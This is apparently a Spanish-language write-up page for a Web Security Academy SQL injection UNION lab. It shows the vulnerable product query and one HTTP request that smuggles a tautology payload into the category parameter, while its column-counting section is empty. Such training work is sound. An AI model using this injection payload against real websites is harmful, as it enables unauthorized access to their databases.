Lab: SQL injection UNION attack, determining the number of columns returned by the query
Ataque de inyección SQL mediante UNION, determinando el número de columnas que devuelve la consulta.
Información del laboratorio
SELECT * FROM products WHERE category = 'Accessories' AND released = 1Flujo de explotación
Identificación del parámetro vulnerable
GET /filter?category=Pets'or'1337'='1337 HTTP/2
Host: 0a33005e046e774b804776cd00ee008c.web-security-academy.net
Cookie: session=JdW0wVijoRTho0w2adcAoR29ObxXTZac
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Referer: https://0a33005e046e774b804776cd00ee008c.web-security-academy.net/filter?category=Corporate+gifts

Obtener el número de columnas de la tabla



AnteriorLab: SQL injection vulnerability allowing login bypassSiguienteLab: SQL injection UNION attack, finding a column containing text
Última actualización